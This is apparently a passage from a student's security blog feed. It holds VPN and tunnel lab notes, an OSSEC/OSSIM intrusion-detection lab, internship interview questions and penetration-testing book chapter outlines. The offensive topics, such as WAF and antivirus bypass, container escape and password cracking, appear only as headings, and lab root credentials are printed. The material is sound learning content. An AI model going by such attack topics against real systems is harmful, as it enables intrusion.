ip_gre</span><br></pre></td></tr></table></figure><p>Load the ip_gre kernel module</p><p><img src="https://i.loli.net/2021/04/22/zGsS1vwuEtA6xUk.png" alt="image-20210422152129613"></p><p>Configure the tunnel (GRE tunnel) so the two sides can reach each other</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# ip tunnel add gre1 mode gre remote 192.168.2.11 local 192.168.1.11 ttl 255</span><br><span class="line">[root@vpn1 ~]# ip a | grep gre1</span><br></pre></td></tr></table></figure><p>Bring up gre1 and assign it the IP address 10.10.10.1</p><p>On vpn2, create a GRE tunnel device gre1 with the remote endpoint set to 192.168.1.11</p><p>Test whether the tunnel works</p><p><img src="https://i.loli.net/2021/04/22/1wjiTASMxmYa2DV.png" alt="image-20210422152200036"></p><p>Finally, unload the GRE module.</p><h3 id="任务二"><a href="#任务二" class="headerlink" title="Task 2"></a>Task 2</h3><p>Create encryption keys with the OpenSSL tool</p><p>View the help information</p><p><img src="https://i.loli.net/2021/04/22/ZxBGHq4QnIuwOW8.png" alt="image-20210422153402076"></p><p>Generate an RSA private key</p><p>Generate the public key corresponding to the private key rsa_private.key</p><p>Generate a password-protected RSA key pair (encrypted with AES-256)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# openssl genrsa -aes256 -passout pass:simple -out rsa__aes_private.key 2048</span><br></pre></td></tr></table></figure><p>Convert between encrypted and unencrypted keys</p><p>Generate an RSA private key and a self-signed certificate</p><p><img src="https://i.loli.net/2021/04/22/XY8ndkyKWNLtxaS.png" alt="image-20210422155013278"></p><h3 id="任务三"><a href="#任务三" class="headerlink" title="Task 3"></a>Task 3</h3><p>SSL VPN: installing and configuring OpenVPN</p><p>[Task description]<br>This task is based on a realistic enterprise network: a typical enterprise LAN built on two servers, in which we will:<br>(1) Set up the OpenVPN server and client.<br>(2) Make the client able to reach the server machine.<br>[Objectives]<br>1. Understand the use cases for enterprise OpenVPN.<br>2. Learn to build and use enterprise OpenVPN.<br>3. Learn to set up and configure the OpenVPN client and server.</p><p>Install OpenVPN on vpn1 and verify the installation</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum clean all</span><br><span class="line">[root@vpn1 ~]# yum install openvpn -y</span><br></pre></td></tr></table></figure><p>Edit the contents of the OpenVPN configuration file server.conf</p><p><img src="https://i.loli.net/2021/04/22/TVwAs5KPDcbWzG7.png" alt="image-20210422160021557"></p><p>Edit the OpenVPN server configuration file</p><p>Set the user the service runs as</p><p>Install the key-generation software</p><p>Configure the environment variables for certificate generation and apply them</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl start</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl enable</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl status</span><br></pre></td></tr></table></figure><p>Start the OpenVPN client and run it in the background</p><p><img src="https://i.loli.net/2021/04/22/d4WmDkjI8TKeosl.png" alt="image-20210422160050158"></p><p>Check the network interfaces</p><p>OpenVPN NAT configuration</p><h3 id="任务四"><a href="#任务四" class="headerlink" title="Task 4"></a>Task 4</h3><p>[Task description]<br>This task is based on a realistic enterprise network: a typical enterprise LAN built on two servers, in which we will:<br>(1) Set up the IPsec server and client.<br>(2) Make the client able to reach the server machine.<br>[Objectives]<br>1. Understand the use cases for enterprise IPsec.<br>2. Learn to build and use enterprise IPsec.<br>3. Learn to set up and configure the IPsec client and server.<br>4. Learn to implement the various IPsec authentication methods</p><p>Add the kernel configuration</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# vim /etc/sysctl.conf</span><br><span class="line">net.ipv4.ip_forward = 1</span><br><span class="line">net.ipv4.conf.default.rp_filter = 0</span><br><span class="line">net.ipv4.conf.all.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.all.send_redirects = 0</span><br><span class="line">net.ipv4.conf.default.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.default.send_redirects = 0</span><br><span class="line">net.ipv4.conf.eth0.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.eth0.send_redirects = 0</span><br><span class="line">net.ipv4.conf.eth1.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.eth1.send_redirects = 0</span><br><span class="line">net.ipv4.conf.lo.accept_redirects = 0</span><br><span class="line">net.ipv4.conf.lo.send_redirects = 0</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/tfWMBZ7bhgicUoz.png" alt="image-20210422160332518"></p><p>Install openswan/libreswan and verify the installation</p><p>Start the service and check that it runs</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum install openswan libreswan -y</span><br><span class="line">[root@vpn1 ~]# ipsec --version</span><br><span class="line">Linux Libreswan U3.20/K(no kernel code presently loaded) on 3.10.0-693.5.2.el7.x86_64</span><br></pre></td></tr></table></figure><p>Restart the service on both ends and verify</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl restart ipsec.service</span><br><span class="line">[root@vpn1 ~]# ipsec auto --up net-to-net</span><br></pre></td></tr></table></figure><p>Generate a new RSA key pair on each of VPN1 and VPN2</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">conn net-to-net</span><br><span class="line"> # IP address of this end</span><br><span class="line"> left=192.168.1.11</span><br><span class="line"> # internal subnet on this end</span><br><span class="line"> leftsubnet=10.0.0.0/24</span><br><span class="line"> # identifier for this end; arbitrary, used to tell multiple connections apart</span><br><span class="line"> leftid=@vpn1</span><br><span class="line"> leftnexthop=%defaultroute</span><br><span class="line"> leftrsasigkey=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</span><br><span class="line"> right=192.168.2.11</span><br><span class="line"> rightsubnet=10.0.1.0/24</span><br><span class="line"> rightid=@vpn2</span><br><span class="line"> rightnexthop=%defaultroute</span><br><span class="line"> rightrsasigkey=0sAwEAAa8cMIBatj+qSxIv+fg75elY9Vbw2lKNnap4rDsVXrS/gRb65I/IQpbjLswePCOllJ1jF5Y3HDOBTBR4wDGWpVlhY5laKnxQnFPeFMeqdCY6p7NWqN4Khf2Pl6YRo5zPe3P0PXuykv0Ns3ga11EEe/NNmwzL8J/9rd3yxbOIH9/lEaKh6pds0ys6aFZH0V0pwNnc7yg0ESKJ9i+uSDVEeDa+OubQv7+lBGuvCxVjhd/bHaqhGTw2UTw001q+zW4T9qGYuctOn5MWAHZsFXAnKu3wwPGMdHpsVbnZjtIPvsKuuD339H42mGAZ6NM2MLSLbZEaVMnaSv3bdVMBjMCe7ur4/N8suJqmZOofPGBCfV0AkLS5Z6J45eERdHxzmweaeprkamfS8nyMxwJeI7ovHiRfh1+jAufCGdeJ9YgMj4mmeVijLqepsmf0WVhga4XOXiLzRcUtE/DKOvHrE9x9QrWeFQwoQ/fOCLvh40iIn80ggZibeuROqhhU8ms4uers4IRhrhAF4ZUCqcxuHm/viNT0nJ6nN3tKfgp0Yc87S4+xA7S5920iQ/YKGMFF58k1TDQOes8la3yWnPBo4O+WegJDtbvyEXk=</span><br><span class="line"> # add only loads the connection without bringing it up; start would connect automatically</span><br><span class="line"> auto=add</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl restart ipsec.service</span><br><span class="line">[root@vpn1 ~]# ipsec auto --up net-to-net</span><br></pre></td></tr></table></figure><h3 id="任务五"><a href="#任务五" class="headerlink" title="Task 5"></a>Task 5</h3><p>[Task description]<br>This task is based on a realistic enterprise network: a typical enterprise LAN built on two servers, in which we will:<br>(1) Build an overlay network so that machines on the same subnet but on different hosts can reach each other.<br>(2) Test network connectivity.<br>[Objectives]<br>1. Understand the use cases for overlay networks.<br>2. Learn to build and use an overlay network.<br>3. Learn to use Open vSwitch.</p><p>Install Open vSwitch on both VPN1 and VPN2 and start the service</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# yum install openvswitch -y</span><br></pre></td></tr></table></figure><p>Start the service</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# systemctl start openvswitch.service</span><br></pre></td></tr></table></figure><p>Configure VPN1 and VPN2</p><p>Build the VXLAN tunnel</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig br0 10.1.0.2/24 up</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/iJBTVnvfKga8uSD.png" alt="image-20210422160925462"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ovs-vsctl add-port br0 vx1 -- set interface vx1 type=vxlan options:remote_ip=192.168.1.11</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/04/22/QqfIJ6S89yn1tmA.png" alt="image-20210422160953588"></p>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>Intrusion Detection with OSSEC</title>
<link href="/2021/04/06/%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B/"/>
<url>/2021/04/06/%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B/</url>
<content type="html"><![CDATA[<h1 id="入侵检测实验"><a href="#入侵检测实验" class="headerlink" title="Intrusion detection lab"></a>Intrusion detection lab</h1><h3 id="实验背景"><a href="#实验背景" class="headerlink" title="Background"></a>Background</h3><p>Computer network security is an international problem: every year the global economic losses caused by breaches of computer network security systems exceed tens of billions of dollars, and the figure keeps growing. Governments, banks and large enterprises all have internal network resources. From a network security perspective, intrusion into, damage to and leakage from a company's internal systems is a serious problem. According to statistics, more than 80% of intrusions worldwide come from inside. Because of performance limitations, firewalls usually cannot provide real-time intrusion detection, and against attacks by insiders a firewall is little more than decoration. How to defend effectively against network intrusions and attacks has therefore become an important component of every country's national security and a key to the healthy, orderly development of the networked economy.</p><p>Intrusion detection is regarded as the second security gate behind the firewall. An intrusion detection system can detect an intrusion before it harms the system, use alerts and protection systems to repel it, and monitor the network without affecting its performance, thus providing real-time protection against internal attacks, external attacks and misuse and greatly improving network security.</p><p>Through hands-on intrusion detection in a complex enterprise network, this lab requires students to understand the concepts and principles of intrusion detection, become familiar with the functions of an intrusion detection system, master common intrusion detection techniques and methods, and ultimately acquire practical intrusion detection skills and information security management competence, qualifying them for the design, research and management of information security systems in government, finance, e-commerce and other organizations, and contributing to national cyberspace security.</p><h3 id="实验任务"><a href="#实验任务" class="headerlink" title="Lab tasks"></a>Lab tasks</h3><p>Task 1: Install and configure OSSEC agents on different operating systems to build the intrusion detection environment;<br>Task 2: Monitor local root logins on the OSSIM server;<br>Task 3: Detect illegal remote intrusions over SSH;<br>Task 4: Monitor root user activity on CentOS 7;<br>Task 5: Monitor the web server access log.</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="Lab objectives"></a>Lab objectives</h3><p>1. Master installing and configuring OSSEC agents on different operating systems.<br>2. Understand the basic functions of PuTTY and master using it to connect to remote machines.<br>3. By installing OSSEC agents, become proficient with PuTTY, master configuring OSSEC agents, understand the architecture, functions and implementation of the OSSEC intrusion detection system, and be able to build an intrusion detection environment.<br>4. Master configuring intrusion detection rules in OSSIM and analysing intrusion behaviour from alerts, acquiring the professional ability to detect and prevent intrusions and maintain system security.</p><h3 id="实验原理"><a href="#实验原理" class="headerlink" title="Principles"></a>Principles</h3><ol><li>Intrusion detection and intrusion detection systems</li></ol><p>Intrusion detection (ID) is, as the name suggests, the detection of intrusions. It collects and analyses information at several key points in a computer network or system to check whether there is behaviour that violates the security policy or signs of attack, so that decision makers can take effective measures to preserve the confidentiality, integrity and availability of network system resources.</p><p>An intrusion detection system (IDS) is a network security system that monitors network traffic in real time and raises an alert or takes active countermeasures when suspicious traffic is found. What distinguishes it from other network security devices is that an IDS is a proactive security technology.</p><ol start="2"><li>Overview of OSSIM and OSSEC</li></ol><p>OSSIM, the Open Source Security Information Management system, is a popular and complete open-source security architecture. By integrating open-source products, OSSIM provides a base platform for security monitoring. Its goal is to offer a centralized, organized framework that allows better monitoring and display.</p><p>OSSIM is explicitly positioned as an integration solution: its goal is not to develop new functionality but to make use of the rich and powerful existing programs (including Snort, RRD, Nmap, Nessus, Ntop and other open-source security tools), integrating them in an open architecture that preserves their original functions and roles. The core of the OSSIM project is integrating and correlating the information these products provide and consolidating the related functions. Thanks to the open-source model, these tools are battle-tested, thoroughly tested and reliable.<br>OSSEC is an open-source intrusion detection system that runs within OSSIM. Architecturally it is client/server; functionally it performs log collection and analysis, integrity checking, rootkit detection, worm detection, Windows registry monitoring and real-time alerting. It supports not only OSSIM itself but also UNIX, Linux, Mac and Windows. Because the OSSEC server is installed in OSSIM and integrated with iptables, only the agent needs to be installed on clients: the OSSEC server + agent model provides HIDS functionality.</p><p>The HIDS in OSSIM (Host-based Intrusion Detection System: as a monitor and analyser of the computer system, it does not act on external interfaces but focuses on the inside of the system, monitoring all or part of the system's dynamic behaviour and its overall state) uses agents installed on other operating systems to audit the operating system and user activity, such as user logins, command execution, software updates, system file integrity and application resource usage, determines from host behaviour whether an intrusion has occurred, and sends alerts to the OSSEC server on OSSIM. This kind of HIDS can analyse intrusion activity precisely and determine which user or process attacked the system.</p><p>The OSSIM workflow is:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(1) The sensors, which act as the security plugins of the whole system, perform their own tasks and raise alerts when they find problems.</span><br><span class="line">(2) The alerts from the sensors are collected centrally.</span><br><span class="line">(3) Each alert record is parsed and stored in the event database (EDB).</span><br><span class="line">(4) Each event is assigned a priority according to the configured policy.</span><br><span class="line">(5) Events are risk-assessed and each alert is given a risk score.</span><br><span class="line">(6) The prioritized events are sent to the correlation engine, which correlates them. Note: the correlation engine takes the alert events reported by the intrusion detection sensors (IDS, firewalls, etc.), correlates them into an intrusion verdict and reports the result to the console.</span><br><span class="line">(7) After correlating one or more events, the correlation engine generates new alert records, which are likewise prioritized, risk-assessed and stored in the database.</span><br><span class="line">(8) The user monitor produces a real-time risk graph from each event.</span><br><span class="line">(9) The control panel shows the most recent correlated alerts, and the low-level console provides all event records.</span><br></pre></td></tr></table></figure><h3 id="实验工具"><a href="#实验工具" class="headerlink" title="Tools"></a>Tools</h3><ul><li>OSSIM</li><li>OSSEC</li><li>Putty</li><li>Firefox</li></ul><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="Lab environment"></a>Lab environment</h3><table><thead><tr><th>Operating system</th><th>IP address</th><th>Role</th><th>Credentials</th></tr></thead><tbody><tr><td>OSSIM</td><td>192.168.1.200</td><td>OSSEC Server</td><td>Username: root; password: Simplexue123</td></tr><tr><td>CentOS7</td><td>192.168.1.6</td><td>OSSEC Agent</td><td>Username: root; password: Simplexue123</td></tr><tr><td>Windows 2012</td><td>192.168.1.5</td><td>OSSEC Agent</td><td>Username: administrator; password: Simplexue123</td></tr></tbody></table><h3 id="实验过程"><a href="#实验过程" class="headerlink" title="Procedure"></a>Procedure</h3><h4 id="任务一"><a href="#任务一" class="headerlink" title="Task 1"></a>Task 1</h4><p>1. Install OSSEC HIDS</p><p><img src="https://i.loli.net/2021/04/07/bJtS6UlwXLOIqCY.png" alt="image-20210407201621741"></p><p>2. Configure it</p><p><img src="https://i.loli.net/2021/04/07/9ZfXv4EDSVwGyjl.png" alt="image-20210407201746103"></p><p>3. On Windows 2012 (server IP 192.168.1.5), log in remotely to the OSSIM server with PuTTY</p><p><img src="https://i.loli.net/2021/04/07/LGsuzAN7mXBETjb.png" alt="image-20210407202036641"></p><p>4. In the PuTTY terminal, start the OSSEC agent manager and create a new OSSEC agent</p><p><img src="https://i.loli.net/2021/04/07/9GBmsEpkwI7yzTA.png" alt="image-20210407202602565"></p><p><img src="https://i.loli.net/2021/04/07/KmXMJ7vlLq2BAZf.png" alt="image-20210407203548341"></p><p>5. From the CentOS 7 terminal, log in to the OSSIM server over SSH</p><p><img src="https://i.loli.net/2021/04/07/Xk7HQMEV5z3f2A4.png" alt="image-20210407204054614"></p><p>6.</p><p><img src="https://i.loli.net/2021/04/07/OZVImALkWeNYrl6.png" alt="image-20210407204312076"></p><p>7.</p><p><img src="https://i.loli.net/2021/04/07/SUzZlBIK7r6Oemv.png" alt="image-20210407204635717"></p><p>8.</p><p><img src="https://i.loli.net/2021/04/07/CZQ5zoLbr2GMXtS.png" alt="image-20210407205224315"></p><h4 id="任务二"><a href="#任务二" class="headerlink" title="Task 2"></a>Task 2</h4><p>2.1 On Windows 2012, open the OSSIM web GUI in Firefox and log in with username admin and password Simplexue123.</p><p><img src="https://i.loli.net/2021/04/07/z6stQgdGv4JiqMO.jpg" alt="img"></p><p><img src="https://i.loli.net/2021/04/07/8IEzhAUcondmwfJ.gif" alt="img"></p><p>2.2 OSSIM ships with many general-purpose intrusion detection rules that can be used without further configuration. Beyond these, OSSEC detection rules are set on the OSSIM platform by editing the ossec.conf rule configuration file. In the OSSIM web UI, click Analysis -> Detection -> HIDS -> Config -> Ossec.conf; you can see that OSSIM already monitors the log file /var/log/auth.log by default. If there is no entry for auth.log in Ossec.conf, add that configuration yourself.</p><p><img src="https://i.loli.net/2021/04/07/kPKJIXFdQztV5xs.jpg" alt="img"></p><p>2.3 Reboot the OSSIM server. Once it is back at the graphical login, press Ctrl+Alt+F1 to switch to the console, log in with username root and password Simplexue123, run exit to log out, then press Ctrl+Alt+F7 to return to the graphical interface. Switching between the graphical and console logins gives OSSEC a source of local root login events on the OSSIM server, so that it can collect the corresponding log entries.</p><p>2.4 From Windows 2012, connect remotely to the server 192.168.1.200.</p><p><img src="https://i.loli.net/2021/04/07/K2YsXfDNbT7xWid.gif" alt="img"></p><p>2.5 In the OSSIM web UI on Windows 2012, click Analysis -> Security Events (SIEM). The Security Events page lists all security event logs covered by OSSIM's preset detection rules, and among them you can find the SSH login alert for the PuTTY remote login. This log entry is important evidence for an administrator deciding whether the remote login was an illegal intrusion: if the OSSIM server does not permit remote root logins, this remote root login is treated as an intrusion.</p><p><img src="https://i.loli.net/2021/04/07/D9TBgXxhZJUikwf.gif" alt="img"></p><p>2.6 Type ossec into the search box of the OSSIM web UI and press Enter to filter for OSSEC alerts.</p><p><img src="https://i.loli.net/2021/04/07/VtO4QHBpsZf5oqA.jpg" alt="img"></p><p>2.7 Because OSSEC monitors /var/log/auth.log, the OSSIM web UI records an OSSEC alert in addition to the SSH remote login security logs, and this alert is important evidence for judging whether the remote login was an illegal intrusion.</p><h4 id="任务三"><a href="#任务三" class="headerlink" title="Task 3"></a>Task 3</h4><p>3.1 Log in to the OSSIM server remotely with PuTTY. In the terminal, cd into /var/ossec/rules (the directory where the OSSEC server stores its detection rule files) and list all server-side rule files with ls. The preset rules in these files can be modified to implement custom detection rules. For this task the file to customize is sshd_rules.xml: the custom rule collects alerts about illegal remote root logins to the OSSIM server, providing evidence for judging and analysing intrusion behaviour and motive.</p><p><img src="https://i.loli.net/2021/04/07/42mT9Kpu5efGrwi.jpg" alt="img"></p><p>3.2 Modify one rule in sshd_rules.xml (rule id 5719): set its level to 2 (the higher the level, the higher the priority, and the sooner the OSSIM server responds to and processes the corresponding alerts) and its alert threshold to 2 attempts. The rule then means: when an illegal user makes more than 2 remote login attempts and the activity lasts more than 30 seconds, an illegal remote login attempt alert is triggered. Save sshd_rules.xml and exit the editor.</p><h4 id="任务四"><a href="#任务四" class="headerlink" title="Task 4"></a>Task 4</h4><p>4.1 Set up rules on the OSSIM platform to monitor user activity on CentOS 7. In the CentOS 7 terminal, inspect the agent's configuration file: OSSIM monitors /var/log/secure by default; if that entry is missing, add it.</p><p><img src="https://i.loli.net/2021/04/07/Zto4dqBJrPQyljX.jpg" alt="img"></p><p>4.2 Restart the OSSIM server (192.168.1.200).</p><p><img src="https://i.loli.net/2021/04/07/c7GiXEqQnSvofyO.jpg" alt="img"></p><p>4.3 Use a tool to simulate an attacker logging in remotely to the server (username root, password Simplexue123).</p><p>4.4 In the server terminal, run "adduser simpleware" and "passwd simpleware" to add a new user simpleware with the password Simplexue123.</p><p><img src="https://i.loli.net/2021/04/07/yFMbPjYWcRhA7Ln.jpg" alt="img"></p><p>4.5 Back in the OSSIM web UI, filter for OSSEC alerts; the OSSEC alert for the new user added on CentOS 7 is visible.</p><p><img src="https://i.loli.net/2021/04/07/gxnNAc1rQTqlISf.jpg" alt="img"></p><p>4.6 Examine the alert detected by the intrusion detection system and note the characteristics of its fields.</p><p><img src="https://i.loli.net/2021/04/07/FBGJc4W9Yw6LeoE.jpg" alt="img"></p><p>The signature of the OSSEC agent's new-user alert shown in the OSSIM web UI is therefore: ossec: New user added to the system</p><h4 id="任务五"><a href="#任务五" class="headerlink" title="Task 5"></a>Task 5</h4><p>5.1 In the CentOS 7 terminal, edit ossec.conf and add the following content to monitor the web server access log. When done, press Esc to leave edit mode and type :wq to save the file.</p><p><img src="https://i.loli.net/2021/04/07/Zto4dqBJrPQyljX.jpg" alt="img"></p><p>5.2 In the terminal, run "/var/ossec/bin/ossec-control restart" to restart the OSSEC service.</p><p><img src="https://i.loli.net/2021/04/07/POJcUdmpXwB1sEi.jpg" alt="img"></p><p>5.3 From Windows 2012, access a forbidden directory. In Firefox on Windows 2012 (IP 192.168.1.5), open a new tab and visit <a href="http://192.168.1.6/dvwa/config">http://192.168.1.6/dvwa/config</a>; the response is Not Found.</p><p><img src="https://i.loli.net/2021/04/07/yFMbPjYWcRhA7Ln.jpg" alt="img"></p><p>5.4 Back in the OSSIM web UI, filter for OSSEC alerts; the alert for the access to the forbidden directory is visible.</p><h3 id="实验感想"><a href="#实验感想" class="headerlink" title="Reflections"></a>Reflections</h3><p>Through this lab:</p><p>1. I mastered installing and configuring OSSEC agents on different operating systems.<br>2. I learned the basic functions of PuTTY and how to use it to connect to remote machines.<br>3. By installing OSSEC agents, I became proficient with PuTTY, learned how to configure OSSEC agents, understood the architecture, functions and implementation of the OSSEC intrusion detection system, and can now build an intrusion detection environment.<br>4. I learned how to configure intrusion detection rules in OSSIM and analyse intrusion behaviour from alerts, acquiring the professional ability to detect and prevent intrusions and maintain system security.</p>]]></content>
<categories>
<category> Security </category>
</categories>
<tags>
<tag> Security </tag>
</tags>
</entry>
<entry>
<title>NSFOCUS Security Services Interview (Internship)</title>
<link href="/2021/04/05/%E7%BB%BF%E7%9B%9F/"/>
<url>/2021/04/05/%E7%BB%BF%E7%9B%9F/</url>
<content type="html"><![CDATA[<p>Date: 2021-4-5</p><p>Duration: 25 min</p><p>Interview</p><p>1. Self-introduction</p><p>2. Which functions are commonly used in SQL injection</p><p>3. The penetration testing process</p><p>4. On cloud security</p><p>5. On ISO 27001 risk assessment</p><p>6. Explain SSRF</p><p>7. What other vulnerabilities do you know</p><p>8. Same-origin policy</p><p>9. Linux</p><ul><li>How to find a process's PID</li><li>Where passwords are stored</li><li>The relationship between passwd and shadow</li></ul><p>10. Machine learning</p><p>Because my résumé mentions NLP (natural language processing).</p><p>The NSFOCUS interview was a good experience; the questions were all fundamentals and related to my résumé.</p>]]></content>
<categories>
<category> Interviews </category>
</categories>
<tags>
<tag> Interviews </tag>
</tags>
</entry>
<entry>
<title>360 Security Engineer Interview (Internship)</title>
<link href="/2021/03/30/360/"/>
<url>/2021/03/30/360/</url>
<content type="html"><![CDATA[<p>Date: 2021-3-30</p><p>Duration: 45 min</p><p>Format: phone interview</p><p>The most professional and patient interviewer I have met so far. (Also the hardest interview so far.)</p><p>I clicked into the 2022 summer internship posting to apply, only to find I had applied for a full-time position... oh well.</p><p><strong>Interview questions:</strong></p><p>1. Self-introduction</p><p>2. WAFs and ways to bypass them</p><p>3. IPS/IDS/HIDS</p><p>4. Cloud security</p><p>5. How to bypass Aegis (安骑士), SafeDog (安全狗) and similar products</p><p>6. Expanding the attack surface with Gopher</p><p>7. Struts2 vulnerabilities</p><p>8. UDF privilege escalation</p><p>9. DOM XSS</p><p>10. Database privilege escalation</p><p>11. How to attack Redis</p><p>12. Internal network penetration</p><p>13. Container security</p><p>14. k8s and Docker escapes</p><p>15. Linux and Windows commands: filtering files, viewing a process's environment variables</p><p>16. How to obtain a webshell when the web server and database are on separate hosts</p><p>Overall, the interviewer was very professional and guided me patiently; unfortunately I have too little hands-on experience and could not answer many of the questions.</p><p>Keep working hard. Go, young man!</p>]]></content>
<categories>
<category> Interviews </category>
</categories>
<tags>
<tag> Interviews </tag>
</tags>
</entry>
<entry>
<title>Penetration Testing Beginner's Notes</title>
<link href="/2021/03/27/%E5%88%9D%E5%AD%A6%E8%80%85/"/>
<url>/2021/03/27/%E5%88%9D%E5%AD%A6%E8%80%85/</url>
<content type="html"><![CDATA[<blockquote><p>I borrowed <em>Penetration Testing: A Hands-On Introduction to Hacking</em> (Chinese edition 《渗透测试完全初学者指南》) from the university library. It is very basic and beginner-friendly; brief notes follow.</p></blockquote><h3 id="第五章-信息收集"><a href="#第五章-信息收集" class="headerlink" title="Chapter 5: Information Gathering"></a>Chapter 5: Information Gathering</h3><h4 id="开源情报"><a href="#开源情报" class="headerlink" title="Open-source intelligence"></a>Open-source intelligence</h4><ul><li>Netcraft</li><li>whois</li><li>DNS reconnaissance<ul><li>nslookup</li><li>host</li><li>Zone transfers</li></ul></li><li>E-mail addresses</li><li>Maltego</li></ul><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="Port scanning"></a>Port scanning</h4><ul><li>Manual</li><li>nmap</li></ul><h3 id="第六章-漏洞检测"><a href="#第六章-漏洞检测" class="headerlink" title="Chapter 6: Finding Vulnerabilities"></a>Chapter 6: Finding Vulnerabilities</h3><ul><li>Nmap</li><li>Nessus<ul><li>Scan policies</li><li>Running a scan</li><li>Vulnerability ratings</li><li>Why scanners are necessary</li><li>Exporting results</li></ul></li><li>Nmap Scripting Engine (NSE) (/usr/share/nmap/scripts)</li><li>Metasploit</li><li>Nikto</li><li>Manual analysis</li></ul><h3 id="第七章-流量捕获"><a href="#第七章-流量捕获" class="headerlink" title="Chapter 7: Capturing Traffic"></a>Chapter 7: Capturing Traffic</h3><ul><li>Wireshark</li><li>ARP cache poisoning</li><li>DNS cache poisoning</li><li>SSL attacks</li><li>SSL stripping</li></ul><h3 id="第八章-漏洞利用"><a href="#第八章-漏洞利用" class="headerlink" title="Chapter 8: Exploitation"></a>Chapter 8: Exploitation</h3><ul><li>MS08-067</li><li>WebDAV</li><li>phpMyAdmin</li><li>Downloading sensitive files</li><li>Third-party software vulnerabilities</li><li>Attacking third-party web applications</li><li>Attacking flaws in system services</li><li>Attacking open NFS shares</li></ul><h3 id="第九章-密码攻击"><a href="#第九章-密码攻击" class="headerlink" title="Chapter 9: Password Attacks"></a>Chapter 9: Password Attacks</h3><ul><li>Password management</li><li>Online password attacks<ul><li>Wordlists</li><li>Hydra</li></ul></li><li>Offline password attacks<ul><li>Recovering Windows SAM hashes</li><li>Dumping hashes</li><li>LM and NTLM algorithms</li><li>Cracking Linux passwords</li><li>Cracking passwords in configuration files</li><li>Rainbow tables</li><li>Online password-cracking services</li><li>Windows Credential Editor for extracting plaintext passwords from memory</li></ul></li></ul><h3 id="第十章-客户端攻击"><a href="#第十章-客户端攻击" class="headerlink" title="Chapter 10: Client-Side Exploitation"></a>Chapter 10: Client-Side Exploitation</h3><ul><li>Metasploit</li><li>Browser exploits</li><li>PDF exploits</li><li>Java exploits</li><li>browser_autopwn</li><li>Winamp</li></ul><h3 id="第十一章-社会工程学"><a href="#第十一章-社会工程学" class="headerlink" title="Chapter 11: Social Engineering"></a>Chapter 11: Social Engineering</h3><ul><li>SET (Social-Engineer Toolkit)</li><li>Spear phishing</li><li>Web attacks</li><li>Mass e-mail attacks</li><li>Multipronged attacks</li></ul><h3 id="第十二章-免杀"><a href="#第十二章-免杀" class="headerlink" title="Chapter 12: Bypassing Antivirus"></a>Chapter 12: Bypassing Antivirus</h3><ul><li>How antivirus software works</li><li>Evading antivirus software</li></ul><h3 id="第十三章-深度渗透"><a href="#第十三章-深度渗透" class="headerlink" title="Chapter 13: Post Exploitation"></a>Chapter 13: Post Exploitation</h3><ul><li>Meterpreter</li><li>Local 